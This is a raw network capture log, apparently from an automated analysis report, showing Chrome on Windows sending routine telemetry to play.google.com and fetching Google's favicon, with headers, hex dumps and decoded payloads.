                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Date: Wed, 24 Jul 2024 05:14:49 GMT
                                                                                        Server: Playlog
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.649800142.250.186.1424436860C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:49 UTC549OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                        Host: play.google.com
                                                                                        Connection: keep-alive
                                                                                        Accept: */*
                                                                                        Access-Control-Request-Method: POST
                                                                                        Access-Control-Request-Headers: x-goog-authuser
                                                                                        Origin: https://accounts.google.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://accounts.google.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-07-24 05:14:49 UTC520INHTTP/1.1 200 OK
                                                                                        Access-Control-Allow-Origin: https://accounts.google.com
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Max-Age: 86400
                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Date: Wed, 24 Jul 2024 05:14:49 GMT
                                                                                        Server: Playlog
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.649802142.250.186.1424436860C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:50 UTC1112OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                        Host: play.google.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 522
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-arch: "x86"
                                                                                        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                        sec-ch-ua-full-version: "117.0.5938.134"
                                                                                        sec-ch-ua-platform-version: "10.0.0"
                                                                                        X-Goog-AuthUser: 0
                                                                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                        sec-ch-ua-bitness: "64"
                                                                                        sec-ch-ua-model: ""
                                                                                        sec-ch-ua-wow64: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://accounts.google.com
                                                                                        X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://accounts.google.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-07-24 05:14:50 UTC522OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 32 32 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 32 31 37 39 38 30 38 37 32 36 33 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c
                                                                                        Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"22",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],1828,[["1721798087263",null,null,null
                                                                                        2024-07-24 05:14:50 UTC925INHTTP/1.1 200 OK
                                                                                        Access-Control-Allow-Origin: https://accounts.google.com
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Allow-Headers: X-Playlog-Web
                                                                                        Set-Cookie: NID=516=lPyAruD9e-CDhYYMzAqXh7uJetiSUku32Be908sANbztx0hyPUj2DOOAg-dmKupxPPU9b_smgCkEKJjmRv39lcHbXcM53rhYXKB6B2cNmyOJAVPm-xITR5PDWJMozAmjZ04qF5-sRBrIZLvTt32lN73ITl73JmsS7JYwytTjFFI; expires=Thu, 23-Jan-2025 05:14:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Date: Wed, 24 Jul 2024 05:14:50 GMT
                                                                                        Server: Playlog
                                                                                        Cache-Control: private
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Accept-Ranges: none
                                                                                        Vary: Accept-Encoding
                                                                                        Expires: Wed, 24 Jul 2024 05:14:50 GMT
                                                                                        Connection: close
                                                                                        Transfer-Encoding: chunked
                                                                                        2024-07-24 05:14:50 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                        Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                        2024-07-24 05:14:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.649807142.250.186.1424436860C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:50 UTC1112OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                        Host: play.google.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 522
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-arch: "x86"
                                                                                        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                        sec-ch-ua-full-version: "117.0.5938.134"
                                                                                        sec-ch-ua-platform-version: "10.0.0"
                                                                                        X-Goog-AuthUser: 0
                                                                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                        sec-ch-ua-bitness: "64"
                                                                                        sec-ch-ua-model: ""
                                                                                        sec-ch-ua-wow64: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://accounts.google.com
                                                                                        X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://accounts.google.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-07-24 05:14:50 UTC522OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 32 32 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 32 31 37 39 38 30 38 37 36 35 33 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c
                                                                                        Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"22",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],1828,[["1721798087653",null,null,null
                                                                                        2024-07-24 05:14:51 UTC925INHTTP/1.1 200 OK
                                                                                        Access-Control-Allow-Origin: https://accounts.google.com
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Allow-Headers: X-Playlog-Web
                                                                                        Set-Cookie: NID=516=JhzboAJunWge4Q7jlHqGeRfn3VQbQeLwT3BICBf-HCVz0K91N-FW59oexUGxiyS_tZ5hpRylE9J4tvcz0-Jp90tDtzR93qAVJ3VUH323Mv-TQ2ha_3vVmPeP96TclGgziKnTy3l3f4tDFF8xce1swgFp3aEDSz3m8eWnyR2HQ44; expires=Thu, 23-Jan-2025 05:14:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Date: Wed, 24 Jul 2024 05:14:51 GMT
                                                                                        Server: Playlog
                                                                                        Cache-Control: private
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Accept-Ranges: none
                                                                                        Vary: Accept-Encoding
                                                                                        Expires: Wed, 24 Jul 2024 05:14:51 GMT
                                                                                        Connection: close
                                                                                        Transfer-Encoding: chunked
                                                                                        2024-07-24 05:14:51 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                        Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                        2024-07-24 05:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.649808142.250.184.2284436860C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:51 UTC1194OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: www.google.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-arch: "x86"
                                                                                        sec-ch-ua-full-version: "117.0.5938.134"
                                                                                        sec-ch-ua-platform-version: "10.0.0"
                                                                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                        sec-ch-ua-bitness: "64"
                                                                                        sec-ch-ua-model: ""
                                                                                        sec-ch-ua-wow64: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://accounts.google.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: NID=516=lPyAruD9e-CDhYYMzAqXh7uJetiSUku32Be908sANbztx0hyPUj2DOOAg-dmKupxPPU9b_smgCkEKJjmRv39lcHbXcM53rhYXKB6B2cNmyOJAVPm-xITR5PDWJMozAmjZ04qF5-sRBrIZLvTt32lN73ITl73JmsS7JYwytTjFFI
                                                                                        2024-07-24 05:14:51 UTC705INHTTP/1.1 200 OK
                                                                                        Accept-Ranges: bytes
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                        Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                        Content-Length: 5430
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server: sffe
                                                                                        X-XSS-Protection: 0
                                                                                        Date: Wed, 24 Jul 2024 04:27:46 GMT
                                                                                        Expires: Thu, 01 Aug 2024 04:27:46 GMT
                                                                                        Cache-Control: public, max-age=691200
                                                                                        Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                        Content-Type: image/x-icon
                                                                                        Vary: Accept-Encoding
                                                                                        Age: 2825
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-07-24 05:14:51 UTC685INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                        Data Ascii: h& ( 0.v]X:X:rY
                                                                                        2024-07-24 05:14:51 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a
                                                                                        Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
                                                                                        2024-07-24 05:14:51 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff
                                                                                        Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
                                                                                        2024-07-24 05:14:51 UTC1390INData Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                        Data Ascii: BBBBBBF!4I
                                                                                        2024-07-24 05:14:51 UTC575INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                        Data Ascii: $'


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.649811142.250.186.1424436860C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:55 UTC1278OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                        Host: play.google.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 933
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-arch: "x86"
                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                        sec-ch-ua-full-version: "117.0.5938.134"
                                                                                        sec-ch-ua-platform-version: "10.0.0"
                                                                                        X-Goog-AuthUser: 0
                                                                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                        sec-ch-ua-bitness: "64"
                                                                                        sec-ch-ua-model: ""
                                                                                        sec-ch-ua-wow64: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://accounts.google.com
                                                                                        X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://accounts.google.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: NID=516=JhzboAJunWge4Q7jlHqGeRfn3VQbQeLwT3BICBf-HCVz0K91N-FW59oexUGxiyS_tZ5hpRylE9J4tvcz0-Jp90tDtzR93qAVJ3VUH323Mv-TQ2ha_3vVmPeP96TclGgziKnTy3l3f4tDFF8xce1swgFp3aEDSz3m8eWnyR2HQ44
                                                                                        2024-07-24 05:14:55 UTC933OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 34 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 35 35 38 2c 5b 5b 22 31 37 32 31 37 39 38 30 38 32 30 30 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                        Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[4,0,0,0,0]]],558,[["1721798082000",null,null,null,
                                                                                        2024-07-24 05:14:55 UTC925INHTTP/1.1 200 OK
                                                                                        Access-Control-Allow-Origin: https://accounts.google.com
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Allow-Headers: X-Playlog-Web
                                                                                        Set-Cookie: NID=516=HD786DnUmOR9n-ge3dU5EQwcmvwRqtGjsNDZ0qb63vwoW67xMW7WVTjAIRPi1cDtwNBvnh8ExVPW68WW_oelHT7ZGaF9D8R_9P-gsS3TzytI7hd6CsRxGsuUI30pgK8KvuV5vB-jEiMYw1vC9YxT7lFuyWyF8Pa4eHTGnMWPpkA; expires=Thu, 23-Jan-2025 05:14:55 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Date: Wed, 24 Jul 2024 05:14:55 GMT
                                                                                        Server: Playlog
                                                                                        Cache-Control: private
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Accept-Ranges: none
                                                                                        Vary: Accept-Encoding
                                                                                        Expires: Wed, 24 Jul 2024 05:14:55 GMT
                                                                                        Connection: close
                                                                                        Transfer-Encoding: chunked
                                                                                        2024-07-24 05:14:55 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                        Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                        2024-07-24 05:14:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


